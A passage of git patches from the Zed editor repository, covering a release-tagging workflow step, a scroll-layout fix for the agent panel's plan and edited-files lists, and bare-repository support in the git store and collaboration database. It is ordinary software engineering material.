{r#" - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" == "200" ]]; then - echo "::error::version $VERSION is already released on $CHANNEL — cannot re-tag a released version" - exit 1 - fi - "#}) - .add_env(("CHANNEL", "${{ steps.info.outputs.channel }}")) - .add_env(("VERSION", "${{ steps.info.outputs.version }}")) - } - - let (authenticate, token) = steps::authenticate_as_zippy().into(); - let resolve_step = resolve_tag(branch); - let version = StepOutput::new(&resolve_step, "version"); - let tag_suffix = StepOutput::new(&resolve_step, "tag_suffix"); - let head_sha = StepOutput::new(&resolve_step, "head_sha"); - - named::job( - Job::default() - .with_repository_owner_guard() - .runs_on(runners::LINUX_XL) - .add_step(authenticate) - .add_step(checkout_branch(branch, &token)) - .add_step(resolve_step) - .add_step(verify_no_existing_release()) - .add_step(steps::update_ref( - steps::GitRef::tag(format!("v{version}{tag_suffix}")), - &head_sha, - &token, - true, - )), - ) -} From f99cd607910dcf1a7aef16964bdd95f240b2206e Mon Sep 17 00:00:00 2001 From: Oleksandr Kholiavko <43780952+HalavicH@users.noreply.github.com> Date: Wed, 29 Apr 2026 15:14:01 +0200 Subject: [PATCH 107/231] agent_ui: Adjust edited files and plan lists to fit content height (#55189) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When a plan contains many tasks (or the edited-files list is long), items were being visually compressed into the fixed-height container rather than scrolling. image_2026-04-28_20-17-43 Asking an agent to "create a plan with 20 tasks" is an easy repro. **Root cause** Both lists used a `v_flex()` as their scroll container, and flexbox children have `flex-shrink: 1` by default. 
When the container hits `max_h`, the flex algorithm compresses all children to fit instead of overflowing into the scroll region — resulting in 20 items crammed into 160px. **Fix** Separate the scroll boundary from the flex layout. A plain `div` (non-flex) as the outer scroll container lets its inner `v_flex` size naturally — content then overflows the bounded `div` and scrolling works correctly. Result: image_2026-04-29_10-09-24 Closes issue #54633. > What's missing: vertical scrollbar, as it requires large refactoring due to double mutable borrowing of `cx` (the second introduced by scroll handle), which will slowdown review of this pr Release Notes: - Fixed plan and edited-files lists in the agent panel being squashed when they contain many items --- .../src/conversation_view/thread_view.rs | 132 +++++++++--------- 1 file changed, 67 insertions(+), 65 deletions(-) diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index ed42c576a36db8..44b51bb491ed5e 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -2295,11 +2295,9 @@ impl ThreadView { .id("edited_files_list") .max_h_40() .overflow_y_scroll() - .children( - sorted_buffers - .into_iter() - .enumerate() - .flat_map(|(index, (buffer, diff))| { + .child( + v_flex().children(sorted_buffers.into_iter().enumerate().flat_map( + |(index, (buffer, diff))| { let file = buffer.read(cx).file()?; let path = file.path(); let path_style = file.path_style(cx); @@ -2402,7 +2400,8 @@ impl ThreadView { .child(buttons); Some(element) - }), + }, + )), ) .into_any_element() } @@ -2786,66 +2785,69 @@ impl ThreadView { .id("plan_items_list") .max_h_40() .overflow_y_scroll() - .children(plan.entries.iter().enumerate().flat_map(|(index, entry)| { - let entry_bg = cx.theme().colors().editor_background; - let tooltip_text: SharedString = entry.content.read(cx).source().to_string().into(); + 
.child( + v_flex().children(plan.entries.iter().enumerate().flat_map(|(index, entry)| { + let entry_bg = cx.theme().colors().editor_background; + let tooltip_text: SharedString = + entry.content.read(cx).source().to_string().into(); - Some( - h_flex() - .id(("plan_entry_row", index)) - .py_1() - .px_2() - .gap_2() - .justify_between() - .relative() - .bg(entry_bg) - .when(index < plan.entries.len() - 1, |parent| { - parent.border_color(cx.theme().colors().border).border_b_1() - }) - .overflow_hidden() - .child( - h_flex() - .id(("plan_entry", index)) - .gap_1p5() - .min_w_0() - .text_xs() - .text_color(cx.theme().colors().text_muted) - .child(match entry.status { - acp::PlanEntryStatus::InProgress => { - Icon::new(IconName::TodoProgress) - .size(IconSize::Small) - .color(Color::Accent) - .with_rotate_animation(2) - .into_any_element() - } - acp::PlanEntryStatus::Completed => { - Icon::new(IconName::TodoComplete) - .size(IconSize::Small) - .color(Color::Success) - .into_any_element() - } - acp::PlanEntryStatus::Pending | _ => { - Icon::new(IconName::TodoPending) - .size(IconSize::Small) - .color(Color::Muted) - .into_any_element() - } - }) - .child(MarkdownElement::new( - entry.content.clone(), - plan_label_markdown_style(&entry.status, window, cx), - )), - ) - .child(div().absolute().top_0().right_0().h_full().w_8().bg( - linear_gradient( - 90., - linear_color_stop(entry_bg, 1.), - linear_color_stop(entry_bg.opacity(0.), 0.), - ), - )) - .tooltip(Tooltip::text(tooltip_text)), - ) - })) + Some( + h_flex() + .id(("plan_entry_row", index)) + .py_1() + .px_2() + .gap_2() + .justify_between() + .relative() + .bg(entry_bg) + .when(index < plan.entries.len() - 1, |parent| { + parent.border_color(cx.theme().colors().border).border_b_1() + }) + .overflow_hidden() + .child( + h_flex() + .id(("plan_entry", index)) + .gap_1p5() + .min_w_0() + .text_xs() + .text_color(cx.theme().colors().text_muted) + .child(match entry.status { + acp::PlanEntryStatus::InProgress => { + 
Icon::new(IconName::TodoProgress) + .size(IconSize::Small) + .color(Color::Accent) + .with_rotate_animation(2) + .into_any_element() + } + acp::PlanEntryStatus::Completed => { + Icon::new(IconName::TodoComplete) + .size(IconSize::Small) + .color(Color::Success) + .into_any_element() + } + acp::PlanEntryStatus::Pending | _ => { + Icon::new(IconName::TodoPending) + .size(IconSize::Small) + .color(Color::Muted) + .into_any_element() + } + }) + .child(MarkdownElement::new( + entry.content.clone(), + plan_label_markdown_style(&entry.status, window, cx), + )), + ) + .child(div().absolute().top_0().right_0().h_full().w_8().bg( + linear_gradient( + 90., + linear_color_stop(entry_bg, 1.), + linear_color_stop(entry_bg.opacity(0.), 0.), + ), + )) + .tooltip(Tooltip::text(tooltip_text)), + ) + })), + ) .into_any_element() } From af7c0e80811bc47cb6657460dcc2d50925e7b57f Mon Sep 17 00:00:00 2001 From: Max Brunsfeld Date: Wed, 29 Apr 2026 06:16:37 -0700 Subject: [PATCH 108/231] Improve bare repo support (#55153) Fixes https://github.com/zed-industries/zed/issues/54830 This fixes a bugs where * when there's no main worktree, we treated the first linked worktree as main * the titlebar and sidebar showed two different things when opening a linked wortree directly When there's no main worktree, our "project group key" will be the bare repo path. For displaying this to the user, we try to present something meaningful: * If the bare repo is `foo.git`, we'll say "foo" * If the bare repo is "bar/.bare", we'll "bar" Release Notes: - Fixed bugs in Zed's sidebar and titlebar when editing in git worktrees created from bare repositories. 
--- .../agent_ui/src/thread_worktree_archive.rs | 2 +- .../20221109000000_test_schema.sql | 2 + .../migrations/20251208000000_test_schema.sql | 6 +- crates/collab/src/db/queries/projects.rs | 7 +- crates/collab/src/db/queries/rooms.rs | 3 +- .../src/db/tables/project_repository.rs | 2 + crates/collab/tests/integration/git_tests.rs | 63 ++++-- crates/git/src/repository.rs | 60 +++--- crates/project/src/git_store.rs | 181 +++++++++++++----- crates/project/src/project.rs | 11 +- crates/project/src/worktree_store.rs | 2 +- crates/project/tests/integration/git_store.rs | 26 ++- .../tests/integration/project_tests.rs | 8 +- crates/proto/proto/git.proto | 4 +- crates/sidebar/src/sidebar.rs | 22 ++- crates/sidebar/src/sidebar_tests.rs | 6 +- crates/title_bar/src/title_bar.rs | 33 ++-- 17 files changed, 312 insertions(+), 126 deletions(-) diff --git a/crates/agent_ui/src/thread_worktree_archive.rs b/crates/agent_ui/src/thread_worktree_archive.rs index bc2dfdd07114dc..73b0a426b3097b 100644 --- a/crates/agent_ui/src/thread_worktree_archive.rs +++ b/crates/agent_ui/src/thread_worktree_archive.rs @@ -160,7 +160,7 @@ pub fn build_root_plan( // Only linked worktrees can be archived to disk via `git worktree remove`. // Main worktrees must be left alone — git refuses to remove them. let (linked_snapshot, repo) = linked_repo?; - let main_repo_path = linked_snapshot.original_repo_abs_path.to_path_buf(); + let main_repo_path = linked_snapshot.main_worktree_abs_path()?.to_path_buf(); // Only archive worktrees that live inside the Zed-managed worktrees // directory (configured via `git.worktree_directory`). 
Worktrees the diff --git a/crates/collab/migrations.sqlite/20221109000000_test_schema.sql b/crates/collab/migrations.sqlite/20221109000000_test_schema.sql index 75175372f24a83..0ef44682a11a60 100644 --- a/crates/collab/migrations.sqlite/20221109000000_test_schema.sql +++ b/crates/collab/migrations.sqlite/20221109000000_test_schema.sql @@ -112,6 +112,8 @@ CREATE TABLE "project_repositories" ( "remote_upstream_url" VARCHAR, "remote_origin_url" VARCHAR, "linked_worktrees" VARCHAR, + "repository_dir_abs_path" VARCHAR, + "common_dir_abs_path" VARCHAR, PRIMARY KEY (project_id, id) ); diff --git a/crates/collab/migrations/20251208000000_test_schema.sql b/crates/collab/migrations/20251208000000_test_schema.sql index 0110dd149b1143..3a3329af776686 100644 --- a/crates/collab/migrations/20251208000000_test_schema.sql +++ b/crates/collab/migrations/20251208000000_test_schema.sql @@ -308,7 +308,9 @@ CREATE TABLE public.project_repositories ( merge_message character varying, remote_upstream_url character varying, remote_origin_url character varying, - linked_worktrees text + linked_worktrees text, + repository_dir_abs_path character varying, + common_dir_abs_path character varying ); CREATE TABLE public.project_repository_statuses ( @@ -333,7 +335,7 @@ CREATE TABLE public.projects ( host_connection_id integer, host_connection_server_id integer, windows_paths boolean DEFAULT false, - features text NOT NULL DEFAULT '' + features text DEFAULT ''::text NOT NULL ); CREATE SEQUENCE public.projects_id_seq diff --git a/crates/collab/src/db/queries/projects.rs b/crates/collab/src/db/queries/projects.rs index cf2f5913a76b46..5afcd69db0ff85 100644 --- a/crates/collab/src/db/queries/projects.rs +++ b/crates/collab/src/db/queries/projects.rs @@ -379,6 +379,8 @@ impl Database { merge_message: ActiveValue::set(update.merge_message.clone()), remote_upstream_url: ActiveValue::set(update.remote_upstream_url.clone()), remote_origin_url: ActiveValue::set(update.remote_origin_url.clone()), + 
repository_dir_abs_path: ActiveValue::set(update.repository_dir_abs_path.clone()), + common_dir_abs_path: ActiveValue::set(update.common_dir_abs_path.clone()), linked_worktrees: ActiveValue::Set(Some( serde_json::to_string(&update.linked_worktrees).unwrap(), )), @@ -396,6 +398,8 @@ impl Database { project_repository::Column::CurrentMergeConflicts, project_repository::Column::HeadCommitDetails, project_repository::Column::MergeMessage, + project_repository::Column::RepositoryDirAbsPath, + project_repository::Column::CommonDirAbsPath, project_repository::Column::LinkedWorktrees, ]) .to_owned(), @@ -893,7 +897,8 @@ impl Database { stash_entries: Vec::new(), remote_upstream_url: db_repository_entry.remote_upstream_url.clone(), remote_origin_url: db_repository_entry.remote_origin_url.clone(), - original_repo_abs_path: Some(db_repository_entry.abs_path), + repository_dir_abs_path: db_repository_entry.repository_dir_abs_path, + common_dir_abs_path: db_repository_entry.common_dir_abs_path, linked_worktrees: db_repository_entry .linked_worktrees .as_deref() diff --git a/crates/collab/src/db/queries/rooms.rs b/crates/collab/src/db/queries/rooms.rs index b17721945f8ea4..b86a0a4206adfd 100644 --- a/crates/collab/src/db/queries/rooms.rs +++ b/crates/collab/src/db/queries/rooms.rs @@ -800,7 +800,8 @@ impl Database { stash_entries: Vec::new(), remote_upstream_url: db_repository.remote_upstream_url.clone(), remote_origin_url: db_repository.remote_origin_url.clone(), - original_repo_abs_path: Some(db_repository.abs_path), + repository_dir_abs_path: db_repository.repository_dir_abs_path, + common_dir_abs_path: db_repository.common_dir_abs_path, linked_worktrees: db_repository .linked_worktrees .as_deref() diff --git a/crates/collab/src/db/tables/project_repository.rs b/crates/collab/src/db/tables/project_repository.rs index 33b20817e61a13..98999acfe81729 100644 --- a/crates/collab/src/db/tables/project_repository.rs +++ b/crates/collab/src/db/tables/project_repository.rs @@ -24,6 
+24,8 @@ pub struct Model { pub head_commit_details: Option, pub remote_upstream_url: Option, pub remote_origin_url: Option, + pub repository_dir_abs_path: Option, + pub common_dir_abs_path: Option, // JSON array of linked worktree objects pub linked_worktrees: Option, } diff --git a/crates/collab/tests/integration/git_tests.rs b/crates/collab/tests/integration/git_tests.rs index 8e00325188cc67..d5c5b1e9e7290b 100644 --- a/crates/collab/tests/integration/git_tests.rs +++ b/crates/collab/tests/integration/git_tests.rs @@ -951,11 +951,19 @@ async fn test_linked_worktrees_sync( executor.run_until_parked(); // Verify host now sees 2 linked worktrees (feature-branch and hotfix-branch). - let host_linked_after_removal = project_a.read_with(cx_a, |project, cx| { - let repos = project.repositories(cx); - let repo = repos.values().next().unwrap(); - repo.read(cx).linked_worktrees().to_vec() - }); + let (host_linked_after_removal, host_git_paths_after_removal) = + project_a.read_with(cx_a, |project, cx| { + let repos = project.repositories(cx); + let repo = repos.values().next().unwrap(); + let repo = repo.read(cx); + ( + repo.linked_worktrees().to_vec(), + ( + repo.repository_dir_abs_path.to_path_buf(), + repo.common_dir_abs_path.to_path_buf(), + ), + ) + }); assert_eq!( host_linked_after_removal.len(), 2, @@ -998,6 +1006,19 @@ async fn test_linked_worktrees_sync( late_joiner_linked, host_linked_after_removal, "late-joining client's linked_worktrees should match host's (DB roundtrip)" ); + let late_joiner_git_paths = project_c.read_with(cx_c, |project, cx| { + let repos = project.repositories(cx); + let repo = repos.values().next().unwrap(); + let repo = repo.read(cx); + ( + repo.repository_dir_abs_path.to_path_buf(), + repo.common_dir_abs_path.to_path_buf(), + ) + }); + assert_eq!( + late_joiner_git_paths, host_git_paths_after_removal, + "late-joining client's git directory paths should match host's (DB roundtrip)" + ); // Test reconnection: disconnect client B (guest) and 
reconnect. // After rejoining, client B should get linked_worktrees back from the DB. @@ -1010,20 +1031,32 @@ async fn test_linked_worktrees_sync( executor.run_until_parked(); // Verify client B still has the correct linked worktrees after reconnection. - let guest_linked_after_reconnect = project_b.read_with(cx_b, |project, cx| { - let repos = project.repositories(cx); - assert_eq!( - repos.len(), - 1, - "guest should still have exactly 1 repository after reconnect" - ); - let repo = repos.values().next().unwrap(); - repo.read(cx).linked_worktrees().to_vec() - }); + let (guest_linked_after_reconnect, guest_git_paths_after_reconnect) = + project_b.read_with(cx_b, |project, cx| { + let repos = project.repositories(cx); + assert_eq!( + repos.len(), + 1, + "guest should still have exactly 1 repository after reconnect" + ); + let repo = repos.values().next().unwrap(); + let repo = repo.read(cx); + ( + repo.linked_worktrees().to_vec(), + ( + repo.repository_dir_abs_path.to_path_buf(), + repo.common_dir_abs_path.to_path_buf(), + ), + ) + }); assert_eq!( guest_linked_after_reconnect, host_linked_after_removal, "guest's linked_worktrees should survive guest disconnect/reconnect" ); + assert_eq!( + guest_git_paths_after_reconnect, host_git_paths_after_removal, + "guest's git directory paths should survive guest disconnect/reconnect" + ); } #[gpui::test] diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index c436ffbf6dfb8d..3e5e14b310b6ae 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -349,9 +349,11 @@ impl Worktree { } } -pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec { +pub fn parse_worktrees_from_str>( + raw_worktrees: T, + main_worktree_path: Option<&Path>, +) -> Vec { let mut worktrees = Vec::new(); - let mut is_first = true; let normalized = raw_worktrees.as_ref().replace("\r\n", "\n"); let entries = normalized.split("\n\n"); for entry in entries { @@ -379,14 +381,16 @@ pub fn 
parse_worktrees_from_str>(raw_worktrees: T) -> Vec BoxFuture<'_, Result>> { let git_binary = self.git_binary(); + let main_worktree_path = { + let repo = self.repository.lock(); + let common_dir = repo.commondir().to_path_buf(); + original_repo_path_from_common_dir(&common_dir) + }; self.executor .spawn(async move { let git = git_binary?; @@ -1840,7 +1849,10 @@ impl GitRepository for RealGitRepository { .await?; if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); - Ok(parse_worktrees_from_str(&stdout)) + Ok(parse_worktrees_from_str( + &stdout, + main_worktree_path.as_deref(), + )) } else { let stderr = String::from_utf8_lossy(&output.stderr); anyhow::bail!("git worktree list failed: {stderr}"); @@ -4146,12 +4158,12 @@ mod tests { #[test] fn test_parse_worktrees_from_str() { // Empty input - let result = parse_worktrees_from_str(""); + let result = parse_worktrees_from_str("", None); assert!(result.is_empty()); // Single worktree (main) let input = "worktree /home/user/project\nHEAD abc123def\nbranch refs/heads/main\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123def"); @@ -4160,23 +4172,23 @@ mod tests { assert!(!result[0].is_bare); // Multiple worktrees - let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ - worktree /home/user/project-wt\nHEAD def456\nbranch refs/heads/feature\n\n"; - let result = parse_worktrees_from_str(input); + let input = "worktree /home/user/project-wt\nHEAD def456\nbranch refs/heads/feature\n\n\ + worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n"; + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 2); - assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - 
assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); - assert!(result[0].is_main); + assert_eq!(result[0].path, PathBuf::from("/home/user/project-wt")); + assert_eq!(result[0].ref_name, Some("refs/heads/feature".into())); + assert!(!result[0].is_main); assert!(!result[0].is_bare); - assert_eq!(result[1].path, PathBuf::from("/home/user/project-wt")); - assert_eq!(result[1].ref_name, Some("refs/heads/feature".into())); - assert!(!result[1].is_main); + assert_eq!(result[1].path, PathBuf::from("/home/user/project")); + assert_eq!(result[1].ref_name, Some("refs/heads/main".into())); + assert!(result[1].is_main); assert!(!result[1].is_bare); // Detached HEAD entry (included with ref_name: None) let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ worktree /home/user/detached\nHEAD def456\ndetached\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); @@ -4187,14 +4199,14 @@ mod tests { assert!(!result[1].is_main); assert!(!result[1].is_bare); - // Bare repo entry (included with ref_name: None) + // Bare repo entry with no main worktree. 
let input = "worktree /home/user/bare.git\nHEAD abc123\nbare\n\n\ worktree /home/user/project\nHEAD def456\nbranch refs/heads/main\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, None); assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/bare.git")); assert_eq!(result[0].ref_name, None); - assert!(result[0].is_main); + assert!(!result[0].is_main); assert!(result[0].is_bare); assert_eq!(result[1].path, PathBuf::from("/home/user/project")); assert_eq!(result[1].ref_name, Some("refs/heads/main".into())); @@ -4205,7 +4217,7 @@ mod tests { let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ worktree /home/user/locked-wt\nHEAD def456\nbranch refs/heads/locked-branch\nlocked\n\n\ worktree /home/user/prunable-wt\nHEAD 789aaa\nbranch refs/heads/prunable-branch\nprunable\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 3); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); @@ -4223,7 +4235,7 @@ mod tests { // Leading/trailing whitespace on lines should be tolerated let input = " worktree /home/user/project \n HEAD abc123 \n branch refs/heads/main \n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); @@ -4232,7 +4244,7 @@ mod tests { // Windows-style line endings should be handled let input = "worktree /home/user/project\r\nHEAD abc123\r\nbranch refs/heads/main\r\n\r\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 1); 
assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 31ad970d6ead84..8956345c68ef82 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -301,11 +301,18 @@ pub struct RepositorySnapshot { pub id: RepositoryId, pub statuses_by_path: SumTree, pub work_directory_abs_path: Arc, - /// The working directory of the original repository. For a normal - /// checkout this equals `work_directory_abs_path`. For a git worktree - /// checkout, this is the original repo's working directory — used to - /// anchor new worktree creation so they don't nest. - pub original_repo_abs_path: Arc, + /// Absolute path to the directory holding this worktree's Git state. + /// + /// For a linked worktree this is the worktree-specific directory under the + /// common Git directory, such as `
/.git/worktrees/`. + pub repository_dir_abs_path: Arc, + /// Absolute path to the repository's common Git directory. + /// + /// For a normal checkout this is `/.git`. For a linked + /// worktree this is the common Git directory shared by all worktrees. If + /// that common directory is a bare repository, there may be no main + /// worktree path to derive from it. + pub common_dir_abs_path: Arc, pub path_style: PathStyle, pub branch: Option, pub branch_list: Arc<[Branch]>, @@ -1640,12 +1647,8 @@ impl GitStore { .. } = update { - let original_repo_abs_path: Arc = git::repository::original_repo_path( - work_directory_abs_path, - common_dir_abs_path, - repository_dir_abs_path, - ) - .into(); + let repository_dir_abs_path = repository_dir_abs_path.clone(); + let common_dir_abs_path = common_dir_abs_path.clone(); let id = RepositoryId(next_repository_id.fetch_add(1, atomic::Ordering::Release)); let is_trusted = TrustedWorktrees::try_get_global(cx) .map(|trusted_worktrees| { @@ -1659,7 +1662,8 @@ impl GitStore { let mut repo = Repository::local( id, work_directory_abs_path.clone(), - original_repo_abs_path.clone(), + repository_dir_abs_path.clone(), + common_dir_abs_path.clone(), dot_git_abs_path.clone(), project_environment.downgrade(), fs.clone(), @@ -1902,9 +1906,10 @@ impl GitStore { &self.repositories } - /// Returns the original (main) repository working directory for the given worktree. - /// For normal checkouts this equals the worktree's own path; for linked - /// worktrees it points back to the original repo. + /// Returns the main repository working directory for the given worktree. + /// For normal checkouts this equals the worktree's own path. For linked + /// worktrees it points back to the main worktree, if one exists. Linked + /// worktrees attached to a bare repository have no main worktree path. 
pub fn original_repo_path_for_worktree( &self, worktree_id: WorktreeId, @@ -1919,7 +1924,12 @@ impl GitStore { .is_some_and(|ids| ids.contains(&worktree_id)) }) .and_then(|repo_id| self.repositories.get(repo_id)) - .map(|repo| repo.read(cx).snapshot().original_repo_abs_path) + .and_then(|repo| { + repo.read(cx) + .snapshot() + .main_worktree_abs_path() + .map(Arc::from) + }) } pub fn status_for_buffer_id(&self, buffer_id: BufferId, cx: &App) -> Option { @@ -2064,8 +2074,12 @@ impl GitStore { let id = RepositoryId::from_proto(update.id); let client = this.upstream_client().context("no upstream client")?; - let original_repo_abs_path: Option> = update - .original_repo_abs_path + let repository_dir_abs_path: Option> = update + .repository_dir_abs_path + .as_deref() + .map(|p| Path::new(p).into()); + let common_dir_abs_path: Option> = update + .common_dir_abs_path .as_deref() .map(|p| Path::new(p).into()); @@ -2076,7 +2090,8 @@ impl GitStore { Repository::remote( id, Path::new(&update.abs_path).into(), - original_repo_abs_path.clone(), + repository_dir_abs_path.clone(), + common_dir_abs_path.clone(), path_style, ProjectId(update.project_id), client, @@ -3926,14 +3941,20 @@ impl RepositorySnapshot { fn empty( id: RepositoryId, work_directory_abs_path: Arc, - original_repo_abs_path: Option>, + repository_dir_abs_path: Option>, + common_dir_abs_path: Option>, path_style: PathStyle, ) -> Self { + let repository_dir_abs_path = + repository_dir_abs_path.unwrap_or_else(|| work_directory_abs_path.join(".git").into()); + let common_dir_abs_path = + common_dir_abs_path.unwrap_or_else(|| repository_dir_abs_path.clone()); + Self { id, statuses_by_path: Default::default(), - original_repo_abs_path: original_repo_abs_path - .unwrap_or_else(|| work_directory_abs_path.clone()), + repository_dir_abs_path, + common_dir_abs_path, work_directory_abs_path, branch: None, branch_list: Arc::from([]), @@ -3980,9 +4001,10 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: 
self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), - original_repo_abs_path: Some( - self.original_repo_abs_path.to_string_lossy().into_owned(), + repository_dir_abs_path: Some( + self.repository_dir_abs_path.to_string_lossy().into_owned(), ), + common_dir_abs_path: Some(self.common_dir_abs_path.to_string_lossy().into_owned()), linked_worktrees: self .linked_worktrees .iter() @@ -4062,9 +4084,10 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), - original_repo_abs_path: Some( - self.original_repo_abs_path.to_string_lossy().into_owned(), + repository_dir_abs_path: Some( + self.repository_dir_abs_path.to_string_lossy().into_owned(), ), + common_dir_abs_path: Some(self.common_dir_abs_path.to_string_lossy().into_owned()), linked_worktrees: self .linked_worktrees .iter() @@ -4073,6 +4096,23 @@ impl RepositorySnapshot { } } + /// Returns the main worktree path for this repository, if one exists. + /// + /// Linked worktrees attached to bare repositories do not have a main + /// worktree. For linked worktrees attached to a non-bare repository, the + /// common Git directory is the main worktree's `.git` directory. + pub fn main_worktree_abs_path(&self) -> Option<&Path> { + if self.is_linked_worktree() { + if self.common_dir_abs_path.file_name()? == std::ffi::OsStr::new(".git") { + self.common_dir_abs_path.parent() + } else { + None + } + } else { + Some(self.work_directory_abs_path.as_ref()) + } + } + /// The main worktree is the original checkout that other worktrees were /// created from. /// @@ -4081,7 +4121,7 @@ impl RepositorySnapshot { /// /// Submodules also return `true` here, since they are not linked worktrees. 
pub fn is_main_worktree(&self) -> bool { - self.work_directory_abs_path == self.original_repo_abs_path + !self.is_linked_worktree() } /// Returns true if this repository is a linked worktree, that is, one that @@ -4089,7 +4129,7 @@ impl RepositorySnapshot { /// /// Returns `false` for both the main worktree and submodules. pub fn is_linked_worktree(&self) -> bool { - !self.is_main_worktree() + self.repository_dir_abs_path != self.common_dir_abs_path } pub fn linked_worktrees(&self) -> &[GitWorktree] { @@ -4266,7 +4306,8 @@ impl Repository { fn local( id: RepositoryId, work_directory_abs_path: Arc, - original_repo_abs_path: Arc, + repository_dir_abs_path: Arc, + common_dir_abs_path: Arc, dot_git_abs_path: Arc, project_environment: WeakEntity, fs: Arc, @@ -4277,7 +4318,8 @@ impl Repository { let snapshot = RepositorySnapshot::empty( id, work_directory_abs_path.clone(), - Some(original_repo_abs_path), + Some(repository_dir_abs_path), + Some(common_dir_abs_path), PathStyle::local(), ); let refetch_repo_state = Arc::new(move |cx: &mut Context| { @@ -4353,7 +4395,8 @@ impl Repository { fn remote( id: RepositoryId, work_directory_abs_path: Arc, - original_repo_abs_path: Option>, + repository_dir_abs_path: Option>, + common_dir_abs_path: Option>, path_style: PathStyle, project_id: ProjectId, client: AnyProtoClient, @@ -4363,7 +4406,8 @@ impl Repository { let snapshot = RepositorySnapshot::empty( id, work_directory_abs_path, - original_repo_abs_path, + repository_dir_abs_path, + common_dir_abs_path, path_style, ); let refetch_repo_state = Arc::new(move |cx: &mut Context| { @@ -6468,15 +6512,13 @@ impl Repository { } /// If this is a linked worktree (*NOT* the main checkout of a repository), - /// returns the pathed for the linked worktree. + /// returns the path for the linked worktree. /// /// Returns None if this is the main checkout. 
pub fn linked_worktree_path(&self) -> Option<&Arc> { - if self.work_directory_abs_path != self.original_repo_abs_path { - Some(&self.work_directory_abs_path) - } else { - None - } + self.snapshot + .is_linked_worktree() + .then_some(&self.work_directory_abs_path) } pub fn path_for_new_linked_worktree( @@ -6484,11 +6526,15 @@ impl Repository { branch_name: &str, worktree_directory_setting: &str, ) -> Result { - let original_repo = self.original_repo_abs_path.clone(); - let project_name = original_repo + let repository_anchor = self + .snapshot + .main_worktree_abs_path() + .unwrap_or(self.common_dir_abs_path.as_ref()); + let project_name = repository_anchor .file_name() .ok_or_else(|| anyhow!("git repo must have a directory name"))?; - let directory = worktrees_directory_for_repo(&original_repo, worktree_directory_setting)?; + let directory = + worktrees_directory_for_repo(repository_anchor, worktree_directory_setting)?; Ok(directory.join(branch_name).join(project_name)) } @@ -6738,7 +6784,11 @@ impl Repository { pub fn remove_worktree(&mut self, path: PathBuf, force: bool) -> oneshot::Receiver> { let id = self.id; - let original_repo_abs_path = self.snapshot.original_repo_abs_path.clone(); + let repository_anchor_path: Arc = self + .snapshot + .main_worktree_abs_path() + .unwrap_or(self.snapshot.common_dir_abs_path.as_ref()) + .into(); self.send_job( Some(format!("git worktree remove: {}", path.display()).into()), move |repo, cx| async move { @@ -6781,7 +6831,7 @@ impl Repository { let managed_worktree_base = cx.update(|cx| { let setting = &ProjectSettings::get_global(cx).git.worktree_directory; - worktrees_directory_for_repo(&original_repo_abs_path, setting).log_err() + worktrees_directory_for_repo(&repository_anchor_path, setting).log_err() }); if let Some(managed_worktree_base) = managed_worktree_base { @@ -7159,8 +7209,12 @@ impl Repository { update: proto::UpdateRepository, cx: &mut Context, ) -> Result<()> { - if let Some(main_path) = 
